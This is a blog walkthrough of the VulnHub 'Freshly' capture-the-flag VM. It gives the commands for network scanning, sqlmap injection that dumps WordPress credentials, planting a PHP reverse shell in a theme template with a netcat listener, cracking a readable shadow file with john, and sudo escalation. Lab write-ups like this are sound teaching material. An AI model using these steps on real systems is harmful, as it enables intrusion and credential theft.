[Hacking series] – TopHatSec:Freshly

Written by  on May 28, 2015 

Code name: Freshly

Webpage: http://www.top-hat-sec.com/r4v3ns-blog/new-vm-challenge-freshly

VM Download: http://download.vulnhub.com/tophatsec/Freshly.ova

Challange: Start the VM, hack your way into the system and get root.

First of all we start the Freshly VM, then we start our Kali Linux(or whatever) box. Now we have both boxes running we simply search our victim in the network.

We start by using netdiscover on Kali Linux to look for our victim

#netdiscover

1

Someone told me long time ago that true hackers can complete all the penetration test proces using only 2 or 3 tools. So if you want a “second opinion” you can also use netcat and bash scripting to scan for alive hosts in the network.

# for i in {1..254}; do nc -v -n -z -w 1 192.168.11.$i 80; done

Here we will check if port 80 is open in all boxes of the network.

2

According to both results netdiscover and netcat, we can guess that our victim might be 192.168.11.7, port 80 is open and MAC VENDOR is Cadmus Computer systems(VirtualBox). Let’s dig a little bit deeper now:

#nmap -Pn -A 192.168.11.7

And what we get is:

3

Ports 80, 443 and 8080 open. Apache running and Linux like box. So port 80 open and apache running? Let’s check it on the browser

4

Lelz. Looks like the “challange” starts here. As no sensitive information was found on the index, we can use  tools like nikto or w3af to see if we can get to more interesting web directories.

# nikto -h http://192.168.11.7

5

As we expected some hidden directories were found on the server, phpmyadmin gives us interesting information, phpmyadmin dir found? then the remote host should be running php and mysql. Let’s browse now login.php file

6

A simple login form was found. Before making any decision, we can look into the html source code(use the source Luke!)

7

What we got here is an html form that refers to itself and uses the post method to send user and password fields. From this point, we got 2 options: we can try to use some software (like hydra) and try to crack the webform, or we can check if that simple web app is vulnerable to an sql injection. I choose the second

# sqlmap -u “http://192.168.11.7/login.php” –data=”user=a&password=b&s=Submit” –dbs –risk 5 –level 3

8

Nice. Sql injection found, next step is to take a look into our server’s databases.

9

And here they are our victim’s databases, now we got this we should spend some time looking at its content. We can look for users, passwords and other sensitive information.

# sqlmap -u “http://192.168.11.7/login.php” –data=”user=a&password=b&s=Submit” -D wordpress8080 -T users –dump –risk 5 –level 3 –threads 9

After a few minutes useful information was found:

10

Et voilà! User:Pass found. As we found a username and its associated password into a database called “wordpress8080” and according to our recent scan our target has the port 8080 open, let’s try to log in.

http://192.168.11.7:8080/wordpress/wp-login.php

11

Admin:SuperSecretPassword and we are in.

What we know? We have a remote server that’s running on Linux with php and mysql. WordPress is installed and we have admin access to it. In our next step we will try to use our admin account on the server CMS to execute evil php code and get a shell in the system.

There are multiple ways to make wordpress execute evil php code, we can edit the 404 err template, php files included in the theme, configuration files or we can simply install a plug-in called “php insert” that allows us to insert php code in posts and pages. We will edit the 404err file with the php-reverse-shell and get a shell into the system.

So first we will start a netcat listener on port 9999 to wait for our reverse shell

# nc -lvp 9999

12

Then we will edit our php-reverse-shell.php code setting our ip address and our listener’s port

13

Now we got this, we will paste the code into the 404err file in our theme options on wordpress just like this

14

What we have to do now is just browse the 404err file and the shell will appear in our netcat window

15

wonderful, we are in. The next step is getting root on the system. When our goal is doing the privilege escalation on a Linux based system, the first step can be about checking the system kernel for possible exploits, the second step is to check for weaknesses and misconfigurations in the file system. We start checking the kernel with

#uname -a

16

Uhm, kernel seems to be up to date and hard to exploit, let’s check the file system. Using the following command we will get all the files owned by root with rx permissions.

#find /etc -user root  -perm -o+rx

17

wtf? it seems that the shadow file of the system has read permissions… now if we take a look inside

18

Got it! shadow file owned+2 user accounts found, now we can try to crack that file with john.

# unshadow passwd shadow > tocrack

# john tocrack

19

Nice, both user accounts cracked.

20

SuperSecretPassword and candycane. Finally we will use the user called “user” to log into the system, we can use python to get a nicer shell that will allow us to log into the system

# python -c ‘import pty; pty.spawn(“/bin/bash”)’

21

Login succesful. Now if our user is in the sudoers file…

22

Here it is, game over P-)

Category : hacking series

Leave a Reply

Your email address will not be published. Required fields are marked *